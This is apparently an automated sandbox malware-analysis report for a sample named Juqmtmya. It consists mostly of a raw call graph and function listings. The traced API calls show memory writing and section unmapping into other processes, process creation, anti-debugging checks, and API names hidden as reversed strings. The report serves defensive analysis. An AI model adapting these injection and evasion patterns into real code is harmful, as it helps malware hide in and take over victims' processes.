GetModuleHandleA GetProcAddress FlushInstructionCache 28926->29592 28927->28926 28929 2cf89d0 4 API calls 28928->28929 28930 2d05b07 28929->28930 28931 2cf89d0 4 API calls 28930->28931 28932 2d05b83 28931->28932 28933 2cf89d0 4 API calls 28932->28933 28934 2d05bff 28933->28934 28935 2cf89d0 4 API calls 28934->28935 28936 2d05c7b 28935->28936 28937 2cf89d0 4 API calls 28936->28937 28938 2d05cf7 28937->28938 28939 2cf89d0 4 API calls 28938->28939 28940 2d05d73 28939->28940 28941 2d05dd3 28940->28941 29281 2d06ff3 28940->29281 28942 2d05df4 28941->28942 28943 2d05dff 28942->28943 28945 2d05e0c 28943->28945 28944 2cf89d0 4 API calls 28952 2d075e4 28944->28952 28946 2d05e2b 28945->28946 28947 2d05e36 28946->28947 28948 2d05e43 28947->28948 28949 2cf89d0 4 API calls 28948->28949 28950 2d05e4f 28949->28950 28951 2d05e70 28950->28951 28953 2d05e7b 28951->28953 28954 2cf89d0 4 API calls 28952->28954 28955 2d05e88 28953->28955 28961 2d07660 28954->28961 28956 2d05ea7 28955->28956 28957 2d05eb2 28956->28957 28958 2d05ebf 28957->28958 28959 2cf89d0 4 API calls 28958->28959 28960 2d05ecb 28959->28960 28963 2d05eec 28960->28963 28962 2cf89d0 4 API calls 28961->28962 28966 2d076dc 28962->28966 28964 2cf89d0 4 API calls 28963->28964 28965 2d05f47 28964->28965 28968 2d05f68 28965->28968 28967 2cf89d0 4 API calls 28966->28967 28971 2d07758 28967->28971 28969 2d05fa0 28968->28969 28970 2d05fd7 28969->28970 28974 2cf89d0 4 API calls 28970->28974 28972 2cf89d0 4 API calls 28971->28972 28973 2d077d4 28972->28973 28979 2d08318 28973->28979 28980 2d077e9 28973->28980 28975 2d05ffb 28974->28975 28976 2d06034 28975->28976 28977 2d0606b 28976->28977 28978 2cf89d0 4 API calls 28977->28978 28981 2d06077 28978->28981 28982 2cf89d0 4 API calls 28979->28982 28983 2cf89d0 4 API calls 28980->28983 28984 2d060a3 28981->28984 28987 2d08394 28982->28987 28988 2d07865 28983->28988 28985 2d060da 28984->28985 28986 2cf89d0 4 API calls 28985->28986 28991 2d060f3 28986->28991 28989 2cf89d0 4 API calls 28987->28989 28990 2cf89d0 4 API calls 28988->28990 28994 2d08410 28989->28994 28995 2d078e1 28990->28995 28992 2d06156 28991->28992 28993 2cf89d0 4 API calls 28992->28993 28999 2d0616f 28993->28999 28996 2cf89d0 4 API calls 28994->28996 28997 2cf89d0 4 API calls 28995->28997 29001 2d0848c 28996->29001 28998 2d0795d 28997->28998 29594 2cf85bc GetModuleHandleA GetProcAddress 28998->29594 29004 2d061ec 28999->29004 29002 2cf89d0 4 API calls 29001->29002 29003 2d08508 29002->29003 29005 2d0851d 29003->29005 29013 2d093a1 29003->29013 29006 2cf89d0 4 API calls 29004->29006 29010 2d0853e 29005->29010 29008 2d0623c 29006->29008 29007 2d07986 29009 2cf89d0 4 API calls 29007->29009 29011 2d06268 29008->29011 29018 2d07a02 29009->29018 29012 2d08575 29010->29012 29015 2d0629f 29011->29015 29014 2cf89d0 4 API calls 29012->29014 29016 2cf89d0 4 API calls 29013->29016 29021 2d08599 29014->29021 29017 2cf89d0 4 API calls 29015->29017 29026 2d0941d 29016->29026 29019 2d062b8 29017->29019 29020 2cf89d0 4 API calls 29018->29020 29022 2d062d9 29019->29022 29031 2d07a7e 29020->29031 29023 2d085d2 29021->29023 29025 2d06310 29022->29025 29024 2d08609 29023->29024 29027 2cf89d0 4 API calls 29024->29027 29030 2cf89d0 4 API calls 29025->29030 29028 2cf89d0 4 API calls 29026->29028 29029 2d08615 29027->29029 29038 2d09499 29028->29038 29034 2d08641 29029->29034 29033 2d06334 29030->29033 29032 2cf89d0 4 API calls 29031->29032 29045 2d07afa 29032->29045 29035 2d0636d 29033->29035 29036 2d08678 29034->29036 29037 2d063a4 29035->29037 29039 2cf89d0 4 API calls 29036->29039 29042 2cf89d0 4 API calls 29037->29042 29040 2cf89d0 4 API calls 29038->29040 29041 2d08691 29039->29041 29058 2d09515 29040->29058 29044 2d086bd 29041->29044 29043 2d063b0 29042->29043 29046 2d063dc 29043->29046 29048 2d086e0 29044->29048 29047 2cf89d0 4 API calls 29045->29047 29050 2d06413 29046->29050 29062 2d07b9d 29047->29062 29049 2d0876e 29048->29049 29051 2d086f2 29048->29051 29055 2d0878f 29049->29055 29052 2cf89d0 4 API calls 29050->29052 29057 2d0871e 29051->29057 29053 2d0642c 29052->29053 29059 2d0644d 29053->29059 29054 2d09cf5 29056 2cf89d0 4 API calls 29054->29056 29064 2d087a7 29055->29064 29070 2d09d71 29056->29070 29061 2d08755 29057->29061 29058->29054 29060 2cf89d0 4 API calls 29058->29060 29067 2d06484 29059->29067 29073 2d095bb 29060->29073 29066 2cf89d0 4 API calls 29061->29066 29063 2cf89d0 4 API calls 29062->29063 29076 2d07c19 29063->29076 29065 2cf89d0 4 API calls 29064->29065 29069 2d087ea 29065->29069 29066->29049 29068 2cf89d0 4 API calls 29067->29068 29072 2d064a8 29068->29072 29078 2d08823 29069->29078 29071 2cf89d0 4 API calls 29070->29071 29083 2d09ded 29071->29083 29593 2cf85bc GetModuleHandleA GetProcAddress 29072->29593 29074 2cf89d0 4 API calls 29073->29074 29086 2d09637 29074->29086 29077 2cf89d0 4 API calls 29076->29077 29090 2d07c95 29077->29090 29079 2cf89d0 4 API calls 29078->29079 29081 2d08866 29079->29081 29080 2d064e6 29082 2d0651f 29080->29082 29094 2d088b9 29081->29094 29085 2d06556 29082->29085 29084 2cf89d0 4 API calls 29083->29084 29089 2d09e69 29084->29089 29088 2cf89d0 4 API calls 29085->29088 29087 2cf89d0 4 API calls 29086->29087 29107 2d096b3 29087->29107 29091 2d06562 29088->29091 29092 2cf89d0 4 API calls 29089->29092 29093 2cf89d0 4 API calls 29090->29093 29096 2d0658e 29091->29096 29095 2d09e9c 29092->29095 29105 2d07d30 29093->29105 29098 2cf89d0 4 API calls 29094->29098 29097 2cf89d0 4 API calls 29095->29097 29101 2d065c5 29096->29101 29100 2d09ecf 29097->29100 29099 2d08914 29098->29099 29110 2d08935 29099->29110 29103 2cf89d0 4 API calls 29100->29103 29102 2cf89d0 4 API calls 29101->29102 29104 2d065de 29102->29104 29108 2d09f02 29103->29108 29109 2d065ff 29104->29109 29106 2cf89d0 4 API calls 29105->29106 29117 2d07dac 29106->29117 29112 2cf89d0 4 API calls 29107->29112 29111 2cf89d0 4 API calls 29108->29111 29114 2d06636 29109->29114 29113 2cf89d0 4 API calls 29110->29113 29119 2d09f35 29111->29119 29120 2d0978a 29112->29120 29123 2d08990 29113->29123 29115 2cf89d0 4 API calls 29114->29115 29116 2d0665a 29115->29116 29127 2d06686 29116->29127 29118 2cf89d0 4 API calls 29117->29118 29136 2d07e28 29118->29136 29121 2cf89d0 4 API calls 29119->29121 29122 2cf89d0 4 API calls 29120->29122 29131 2d09fb1 29121->29131 29134 2d09806 29122->29134 29124 2cf89d0 4 API calls 29123->29124 29125 2d08a0c 29124->29125 29597 2cfd164 NtAllocateVirtualMemory NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 29125->29597 29128 2cf89d0 4 API calls 29127->29128 29129 2d066d6 29128->29129 29130 2d066eb 29129->29130 29143 2d06949 29129->29143 29133 2d0670c 29130->29133 29132 2cf89d0 4 API calls 29131->29132 29147 2d0a02d 29132->29147 29141 2d06743 29133->29141 29137 2cf89d0 4 API calls 29134->29137 29213 2d09aa9 29134->29213 29135 2d08a20 29139 2cf89d0 4 API calls 29135->29139 29140 2cf89d0 4 API calls 29136->29140 29150 2d09894 29137->29150 29138 2cf89d0 4 API calls 29151 2d09b6b 29138->29151 29152 2d08aa1 29139->29152 29142 2d07ee5 29140->29142 29144 2cf89d0 4 API calls 29141->29144 29595 2cf7e50 GetModuleHandleA GetProcAddress 29142->29595 29146 2cf89d0 4 API calls 29143->29146 29149 2d06767 29144->29149 29160 2d069c5 29146->29160 29148 2cf89d0 4 API calls 29147->29148 29154 2d0a0a9 29148->29154 29158 2d067a0 29149->29158 29153 2cf89d0 4 API calls 29150->29153 29155 2cf89d0 4 API calls 29151->29155 29156 2cf89d0 4 API calls 29152->29156 29169 2d09910 29153->29169 29157 2cf89d0 4 API calls 29154->29157 29170 2d09be7 29155->29170 29171 2d08b1d 29156->29171 29159 2d0a0dc 29157->29159 29161 2d067d7 29158->29161 29166 2cf89d0 4 API calls 29159->29166 29164 2cf89d0 4 API calls 29160->29164 29165 2cf89d0 4 API calls 29161->29165 29162 2d07f08 29163 2cf89d0 4 API calls 29162->29163 29182 2d07f84 29163->29182 29181 2d06a41 29164->29181 29167 2d067e3 29165->29167 29168 2d0a10f 29166->29168 29176 2d0680f 29167->29176 29173 2cf89d0 4 API calls 29168->29173 29172 2cf89d0 4 API calls 29169->29172 29174 2cf89d0 4 API calls 29170->29174 29175 2cf89d0 4 API calls 29171->29175 29196 2d0998c 29172->29196 29180 2d0a142 29173->29180 29191 2d09c63 29174->29191 29177 2d08b99 29175->29177 29179 2d06846 29176->29179 29193 2d08bb9 29177->29193 29598 2cf8730 GetModuleHandleA GetProcAddress 29177->29598 29185 2cf89d0 4 API calls 29179->29185 29183 2cf89d0 4 API calls 29180->29183 29184 2cf89d0 4 API calls 29181->29184 29186 2cf89d0 4 API calls 29182->29186 29188 2d0a175 29183->29188 29202 2d06abd 29184->29202 29187 2d0685f 29185->29187 29201 2d08000 29186->29201 29190 2d06880 29187->29190 29189 2cf89d0 4 API calls 29188->29189 29206 2d0a1a8 29189->29206 29199 2d068b7 29190->29199 29192 2cf89d0 4 API calls 29191->29192 29194 2d09cdf 29192->29194 29195 2cf89d0 4 API calls 29193->29195 29436 2cf8d70 29194->29436 29208 2d08c35 29195->29208 29197 2cf89d0 4 API calls 29196->29197 29211 2d09a2d 29197->29211 29200 2d068cf 29199->29200 29203 2cf89d0 4 API calls 29200->29203 29204 2cf89d0 4 API calls 29201->29204 29205 2cf89d0 4 API calls 29202->29205 29210 2d068db 29203->29210 29214 2d0807c 29204->29214 29215 2d06b39 29205->29215 29207 2cf89d0 4 API calls 29206->29207 29221 2d0a224 29207->29221 29209 2cf89d0 4 API calls 29208->29209 29223 2d08cb1 29209->29223 29210->29143 29212 2cf89d0 4 API calls 29211->29212 29212->29213 29213->29138 29216 2cf89d0 4 API calls 29214->29216 29217 2cf89d0 4 API calls 29215->29217 29218 2d080f8 29216->29218 29227 2d06bb5 29217->29227 29596 2cfb118 NtAllocateVirtualMemory NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 29218->29596 29220 2d08109 29220->28288 29222 2cf89d0 4 API calls 29221->29222 29225 2d0a2a0 29222->29225 29224 2cf89d0 4 API calls 29223->29224 29229 2d08d2d 29224->29229 29226 2cf89d0 4 API calls 29225->29226 29230 2d0a2d3 29226->29230 29228 2cf89d0 4 API calls 29227->29228 29233 2d06c31 29228->29233 29231 2cf89d0 4 API calls 29229->29231 29232 2cf89d0 4 API calls 29230->29232 29236 2d08db4 29231->29236 29235 2d0a34f 29232->29235 29234 2cf89d0 4 API calls 29233->29234 29239 2d06cad 29234->29239 29237 2cf89d0 4 API calls 29235->29237 29238 2cf89d0 4 API calls 29236->29238 29241 2d0a3cb 29237->29241 29242 2d08e30 29238->29242 29240 2cf89d0 4 API calls 29239->29240 29251 2d06d48 29240->29251 29243 2cf89d0 4 API calls 29241->29243 29244 2cf89d0 4 API calls 29242->29244 29245 2d0a447 29243->29245 29249 2d08eac 29244->29249 29246 2cf89d0 4 API calls 29245->29246 29247 2d0a47a 29246->29247 29248 2cf89d0 4 API calls 29247->29248 29250 2d0a4ad 29248->29250 29252 2cf89d0 4 API calls 29249->29252 29253 2cf89d0 4 API calls 29250->29253 29254 2cf89d0 4 API calls 29251->29254 29257 2d08f33 29252->29257 29255 2d0a4e0 29253->29255 29259 2d06e43 29254->29259 29256 2cf89d0 4 API calls 29255->29256 29261 2d0a513 29256->29261 29258 2cf89d0 4 API calls 29257->29258 29263 2d08faf 29258->29263 29260 2cf89d0 4 API calls 29259->29260 29267 2d06ebf 29260->29267 29262 2cf89d0 4 API calls 29261->29262 29265 2d0a58f 29262->29265 29264 2cf89d0 4 API calls 29263->29264 29270 2d0902b 29264->29270 29266 2cf89d0 4 API calls 29265->29266 29269 2d0a60b 29266->29269 29268 2cf89d0 4 API calls 29267->29268 29276 2d06f77 29268->29276 29272 2cf89d0 4 API calls 29269->29272 29271 2cf89d0 4 API calls 29270->29271 29279 2d090a7 29271->29279 29273 2d0a63e 29272->29273 29274 2cf89d0 4 API calls 29273->29274 29275 2d0a671 29274->29275 29278 2cf89d0 4 API calls 29275->29278 29277 2cf89d0 4 API calls 29276->29277 29277->29281 29282 2d0a6a4 29278->29282 29280 2cf89d0 4 API calls 29279->29280 29286 2d09123 29280->29286 29281->28288 29281->28944 29283 2cf89d0 4 API calls 29282->29283 29284 2d0a6d7 29283->29284 29285 2cf89d0 4 API calls 29284->29285 29288 2d0a70a 29285->29288 29287 2cf89d0 4 API calls 29286->29287 29290 2d0919f 29287->29290 29289 2cf89d0 4 API calls 29288->29289 29299 2d0a786 29289->29299 29291 2cf89d0 4 API calls 29290->29291 29292 2d0921b 29291->29292 29599 2cf894c 29292->29599 29294 2d0923a 29295 2cf894c 3 API calls 29294->29295 29296 2d0924e 29295->29296 29297 2cf894c 3 API calls 29296->29297 29298 2d09262 29297->29298 29300 2cf894c 3 API calls 29298->29300 29301 2cf89d0 4 API calls 29299->29301 29302 2d09276 29300->29302 29306 2d0a802 29301->29306 29303 2cf894c 3 API calls 29302->29303 29304 2d0928a 29303->29304 29305 2cf894c 3 API calls 29304->29305 29308 2d0929e 29305->29308 29307 2cf89d0 4 API calls 29306->29307 29310 2d0a87e 29307->29310 29309 2cf89d0 4 API calls 29308->29309 29312 2d09325 29309->29312 29311 2cf89d0 4 API calls 29310->29311 29314 2d0a8fa 29311->29314 29313 2cf89d0 4 API calls 29312->29313 29313->29013 29315 2cf89d0 4 API calls 29314->29315 29316 2d0a976 29315->29316 29317 2cf89d0 4 API calls 29316->29317 29318 2d0a985 29317->29318 29319 2cf89d0 4 API calls 29318->29319 29320 2d0a994 29319->29320 29321 2cf89d0 4 API calls 29320->29321 29322 2d0a9a3 29321->29322 29323 2cf89d0 4 API calls 29322->29323 29324 2d0a9b2 29323->29324 29325 2cf89d0 4 API calls 29324->29325 29326 2d0a9c1 29325->29326 29327 2cf89d0 4 API calls 29326->29327 29328 2d0a9d0 29327->29328 29329 2cf89d0 4 API calls 29328->29329 29330 2d0a9df 29329->29330 29331 2cf89d0 4 API calls 29330->29331 29332 2d0a9ee 29331->29332 29333 2cf89d0 4 API calls 29332->29333 29334 2d0a9fd 29333->29334 29335 2cf89d0 4 API calls 29334->29335 29336 2d0aa0c 29335->29336 29337 2cf89d0 4 API calls 29336->29337 29338 2d0aa1b 29337->29338 29339 2cf89d0 4 API calls 29338->29339 29340 2d0aa2a 29339->29340 29341 2cf89d0 4 API calls 29340->29341 29342 2d0aa39 29341->29342 29343 2cf89d0 4 API calls 29342->29343 29344 2d0aa48 29343->29344 29345 2cf89d0 4 API calls 29344->29345 29346 2d0aa57 29345->29346 29347 2cf89d0 4 API calls 29346->29347 29348 2d0aad3 29347->29348 29349 2cf89d0 4 API calls 29348->29349 29350 2d0ab06 29349->29350 29351 2cf89d0 4 API calls 29350->29351 29352 2d0ab39 29351->29352 29353 2cf89d0 4 API calls 29352->29353 29354 2d0ab6c 29353->29354 29355 2cf89d0 4 API calls 29354->29355 29356 2d0ab9f 29355->29356 29357 2cf89d0 4 API calls 29356->29357 29358 2d0abd2 29357->29358 29359 2cf89d0 4 API calls 29358->29359 29360 2d0ac05 29359->29360 29361 2cf89d0 4 API calls 29360->29361 29362 2d0ac38 29361->29362 29363 2cf89d0 4 API calls 29362->29363 29364 2d0acb4 29363->29364 29365 2cf89d0 4 API calls 29364->29365 29366 2d0ad30 29365->29366 29367 2cf89d0 4 API calls 29366->29367 29368 2d0adac 29367->29368 29369 2cf89d0 4 API calls 29368->29369 29370 2d0addf 29369->29370 29371 2cf89d0 4 API calls 29370->29371 29372 2d0ae12 29371->29372 29373 2cf89d0 4 API calls 29372->29373 29374 2d0ae45 29373->29374 29375 2cf89d0 4 API calls 29374->29375 29376 2d0ae78 29375->29376 29377 2cf89d0 4 API calls 29376->29377 29378 2d0aeab 29377->29378 29379 2cf89d0 4 API calls 29378->29379 29380 2d0aede 29379->29380 29381 2cf89d0 4 API calls 29380->29381 29382 2d0af11 29381->29382 29383 2cf89d0 4 API calls 29382->29383 29384 2d0af44 29383->29384 29385 2cf89d0 4 API calls 29384->29385 29386 2d0af77 29385->29386 29387 2cf89d0 4 API calls 29386->29387 29388 2d0afaa 29387->29388 29389 2cf89d0 4 API calls 29388->29389 29390 2d0afdd 29389->29390 29391 2cf89d0 4 API calls 29390->29391 29392 2d0b010 29391->29392 29393 2cf89d0 4 API calls 29392->29393 29394 2d0b043 29393->29394 29395 2cf89d0 4 API calls 29394->29395 29396 2d0b076 29395->29396 29397 2cf89d0 4 API calls 29396->29397 29398 2d0b0a9 29397->29398 29399 2cf89d0 4 API calls 29398->29399 29400 2d0b0dc 29399->29400 29401 2cf89d0 4 API calls 29400->29401 29402 2d0b10f 29401->29402 29403 2cf89d0 4 API calls 29402->29403 29404 2d0b142 29403->29404 29405 2cf89d0 4 API calls 29404->29405 29406 2d0b175 29405->29406 29603 2cf8338 29406->29603 29408 2d0b184 29409 2cf89d0 4 API calls 29408->29409 29410 2d0b200 29409->29410 29411 2cf89d0 4 API calls 29410->29411 29412 2d0b27c 29411->29412 29413 2cf89d0 4 API calls 29412->29413 29413->28321 29415 2cf88c6 29414->29415 29610 2cf8274 29415->29610 29417 2cf88f1 29614 2cf7d78 29417->29614 29419 2cf891f 29419->28292 29421 2cf89e4 29420->29421 29422 2cf81cc 2 API calls 29421->29422 29423 2cf8a1d 29422->29423 29424 2cf8274 GetProcAddress 29423->29424 29425 2cf8a36 29424->29425 29426 2cf7d78 3 API calls 29425->29426 29427 2cf8a95 29426->29427 29428 2cf8338 3 API calls 29427->29428 29429 2cf8aa4 29428->29429 29429->28297 29431 2cff759 29430->29431 29432 2cff774 CheckRemoteDebuggerPresent 29431->29432 29433 2cff786 29431->29433 29432->29433 29433->28323 29435 2ce4871 29434->29435 29437 2cf8d78 29436->29437 29438 2cf89d0 4 API calls 29437->29438 29439 2cf8dfb 29438->29439 29440 2cf89d0 4 API calls 29439->29440 29441 2cf8e54 29440->29441 29442 2cfa8b7 29441->29442 29443 2cf89d0 4 API calls 29441->29443 29442->29054 29444 2cf8ec5 29443->29444 29445 2cf89d0 4 API calls 29444->29445 29446 2cf8f1e 29445->29446 29446->29442 29447 2cf89d0 4 API calls 29446->29447 29448 2cf8fa6 29447->29448 29449 2cf89d0 4 API calls 29448->29449 29450 2cf8fff 29449->29450 29451 2cf89d0 4 API calls 29450->29451 29452 2cf9084 29451->29452 29453 2cf89d0 4 API calls 29452->29453 29454 2cf90e3 29453->29454 29455 2cf89d0 4 API calls 29454->29455 29456 2cf9154 29455->29456 29457 2cf89d0 4 API calls 29456->29457 29458 2cf91c5 29457->29458 29459 2cf89d0 4 API calls 29458->29459 29460 2cf9236 29459->29460 29626 2cf8788 29460->29626 29462 2cf9273 29463 2cf92e8 29462->29463 29465 2cf89d0 4 API calls 29462->29465 29464 2cf89d0 4 API calls 29463->29464 29466 2cf9359 29464->29466 29465->29463 29467 2cf89d0 4 API calls 29466->29467 29468 2cf938c 29467->29468 29469 2cf89d0 4 API calls 29468->29469 29470 2cf93fd 29469->29470 29471 2cf89d0 4 API calls 29470->29471 29472 2cf946e 29471->29472 29473 2cf89d0 4 API calls 29472->29473 29474 2cf950b 29473->29474 29475 2cf89d0 4 API calls 29474->29475 29476 2cf957c 29475->29476 29477 2cf89d0 4 API calls 29476->29477 29478 2cf95ed 29477->29478 29478->29442 29479 2cf89d0 4 API calls 29478->29479 29480 2cf9680 29479->29480 29481 2cf89d0 4 API calls 29480->29481 29482 2cf96f1 29481->29482 29483 2cf89d0 4 API calls 29482->29483 29484 2cf9762 29483->29484 29485 2cf89d0 4 API calls 29484->29485 29486 2cf97d3 29485->29486 29487 2cf89d0 4 API calls 29486->29487 29488 2cf9844 29487->29488 29633 2cf8400 29488->29633 29490 2cf9864 29491 2cf9878 29490->29491 29492 2cf9b7f 29490->29492 29494 2cf89d0 4 API calls 29491->29494 29493 2cf89d0 4 API calls 29492->29493 29495 2cf9b78 29492->29495 29493->29495 29497 2cf98e9 29494->29497 29496 2cf89d0 4 API calls 29495->29496 29499 2cf9c61 29496->29499 29498 2cf89d0 4 API calls 29497->29498 29500 2cf995a 29498->29500 29501 2cf89d0 4 API calls 29499->29501 29502 2cf89d0 4 API calls 29500->29502 29508 2cf9cd2 29501->29508 29503 2cf99cb 29502->29503 29640 2cf8670 29503->29640 29505 2cf99df 29506 2cf99e3 29505->29506 29512 2cf9a0b 29505->29512 29647 2cf7a2c 29506->29647 29509 2cf89d0 4 API calls 29508->29509 29510 2cf9d43 29509->29510 29511 2cf7a2c 3 API calls 29510->29511 29516 2cf9d64 29511->29516 29513 2cf89d0 4 API calls 29512->29513 29514 2cf9a04 29512->29514 29513->29514 29515 2cf89d0 4 API calls 29514->29515 29518 2cf9aed 29515->29518 29516->29442 29517 2cf89d0 4 API calls 29516->29517 29522 2cf9de7 29517->29522 29519 2cf89d0 4 API calls 29518->29519 29520 2cf9b5e 29519->29520 29521 2cf7a2c 3 API calls 29520->29521 29521->29495 29523 2cf89d0 4 API calls 29522->29523 29524 2cf9e58 29523->29524 29525 2cf89d0 4 API calls 29524->29525 29526 2cf9f34 29525->29526 29527 2cf89d0 4 API calls 29526->29527 29528 2cf9fa5 29527->29528 29529 2cf89d0 4 API calls 29528->29529 29530 2cfa016 29529->29530 29531 2cf7d78 3 API calls 29530->29531 29532 2cfa033 29531->29532 29533 2cf89d0 4 API calls 29532->29533 29534 2cfa0a4 29533->29534 29535 2cf89d0 4 API calls 29534->29535 29536 2cfa115 29535->29536 29537 2cf89d0 4 API calls 29536->29537 29538 2cfa186 29537->29538 29539 2cf7d78 3 API calls 29538->29539 29540 2cfa1a6 29539->29540 29541 2cf89d0 4 API calls 29540->29541 29542 2cfa217 29541->29542 29543 2cf89d0 4 API calls 29542->29543 29544 2cfa288 29543->29544 29545 2cf89d0 4 API calls 29544->29545 29546 2cfa2f9 29545->29546 29547 2cf89d0 4 API calls 29546->29547 29548 2cfa39a 29547->29548 29549 2cf89d0 4 API calls 29548->29549 29550 2cfa40b 29549->29550 29551 2cf89d0 4 API calls 29550->29551 29552 2cfa47c 29551->29552 29553 2cf89d0 4 API calls 29552->29553 29554 2cfa4ed 29553->29554 29555 2cf89d0 4 API calls 29554->29555 29556 2cfa573 29555->29556 29557 2cf894c 3 API calls 29556->29557 29558 2cfa587 29557->29558 29559 2cf894c 3 API calls 29558->29559 29560 2cfa59b 29559->29560 29561 2cf894c 3 API calls 29560->29561 29562 2cfa5af 29561->29562 29563 2cf89d0 4 API calls 29562->29563 29564 2cfa620 29563->29564 29565 2cf894c 3 API calls 29564->29565 29566 2cfa634 29565->29566 29567 2cf894c 3 API calls 29566->29567 29568 2cfa648 29567->29568 29569 2cf894c 3 API calls 29568->29569 29570 2cfa69a 29569->29570 29571 2cf894c 3 API calls 29570->29571 29572 2cfa6ec 29571->29572 29573 2cf894c 3 API calls 29572->29573 29574 2cfa700 29573->29574 29575 2cf894c 3 API calls 29574->29575 29576 2cfa714 29575->29576 29577 2cf894c 3 API calls 29576->29577 29578 2cfa728 29577->29578 29579 2cf894c 3 API calls 29578->29579 29580 2cfa73c 29579->29580 29581 2cf894c 3 API calls 29580->29581 29582 2cfa78e 29581->29582 29583 2cf894c 3 API calls 29582->29583 29584 2cfa7e0 29583->29584 29585 2cf894c 3 API calls 29584->29585 29586 2cfa832 29585->29586 29587 2cf894c 3 API calls 29586->29587 29588 2cfa884 29587->29588 29589 2cf894c 3 API calls 29588->29589 29590 2cfa8a3 29589->29590 29591 2cf894c 3 API calls 29590->29591 29591->29442 29592->28926 29593->29080 29594->29007 29595->29162 29596->29220 29597->29135 29598->29193 29600 2cf8965 29599->29600 29601 2cf7d78 3 API calls 29600->29601 29602 2cf89a5 29600->29602 29601->29602 29602->29294 29604 2cf835b 29603->29604 29605 2cf81cc 2 API calls 29604->29605 29606 2cf838d 29605->29606 29607 2cf8274 GetProcAddress 29606->29607 29608 2cf8393 FlushInstructionCache 29607->29608 29609 2cf83c1 29608->29609 29609->29408 29611 2cf8299 29610->29611 29612 2cf82cc GetProcAddress 29611->29612 29613 2cf82fb 29612->29613 29613->29417 29615 2cf7d9d 29614->29615 29621 2cf81cc 29615->29621 29617 2cf7dcd 29618 2cf8274 GetProcAddress 29617->29618 29619 2cf7dd3 NtWriteVirtualMemory 29618->29619 29620 2cf7e0c 29619->29620 29620->29419 29622 2cf81ef 29621->29622 29623 2cf8274 GetProcAddress 29622->29623 29624 2cf8215 GetModuleHandleA 29623->29624 29625 2cf823b 29624->29625 29625->29617 29627 2cf87ab 29626->29627 29628 2cf81cc 2 API calls 29627->29628 29629 2cf87dd 29628->29629 29630 2cf8274 GetProcAddress 29629->29630 29631 2cf87e3 CreateProcessAsUserW 29630->29631 29632 2cf882f 29631->29632 29632->29462 29634 2cf8425 29633->29634 29635 2cf81cc 2 API calls 29634->29635 29636 2cf8452 29635->29636 29637 2cf8274 GetProcAddress 29636->29637 29638 2cf8458 NtReadVirtualMemory 29637->29638 29639 2cf8493 29638->29639 29639->29490 29641 2cf8695 29640->29641 29642 2cf81cc 2 API calls 29641->29642 29643 2cf86c2 29642->29643 29644 2cf8274 GetProcAddress 29643->29644 29645 2cf86c8 NtUnmapViewOfSection 29644->29645 29646 2cf86f5 29645->29646 29646->29505 29648 2cf7a2e 29647->29648 29649 2cf81cc 2 API calls 29648->29649 29650 2cf7a7e 29649->29650 29651 2cf8274 GetProcAddress 29650->29651 29652 2cf7a84 NtAllocateVirtualMemory 29651->29652 29653 2cf7ac2 29652->29653 29653->29514

                                                                                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                                                                                  Function 02CF7AC9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53memorynativeCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 12890 2cf7ac9 12891 2cf7a56 12890->12891 12892 2cf7a2e-2cf7a54 call 2ce4530 12891->12892 12893 2cf7a58-2cf7ac2 call 2cf798c call 2ce47ec call 2ce49a0 call 2cf81cc call 2cf8274 NtAllocateVirtualMemory call 2ce4500 12891->12893 12892->12891
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CF7A9F
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2348010673.0000000002CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CE1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_2ce1000_Juqmtmya.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2167126740-445027087
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 61ab34d3b642c09d6735b546244bf27655dad8982adf070d6f80b55633639234
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1bdf89e633d9063b2e892f63083cc48d7d225c8f962ec92eea6c3525a15b9d03
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61ab34d3b642c09d6735b546244bf27655dad8982adf070d6f80b55633639234
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D116D75680308BFEB94EFA4DC45FAEB7AEEB48700F415464FA05D7600D630AE08DB24
                                                                                                                                                                                                                                                                                                                                  Function 02CF7A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 12908 2cf7a2a-2cf7a47 12910 2cf7a51-2cf7a56 12908->12910 12911 2cf7a4c call 2ce4530 12908->12911 12913 2cf7a2e-2cf7a4c call 2ce4530 12910->12913 12914 2cf7a58-2cf7ac2 call 2cf798c call 2ce47ec call 2ce49a0 call 2cf81cc call 2cf8274 NtAllocateVirtualMemory call 2ce4500 12910->12914 12911->12910 12913->12910
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02CF81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CF821E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02CF8274: GetProcAddress.KERNEL32(?,?), ref: 02CF82D9
                                                                                                                                                                                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CF7A9F
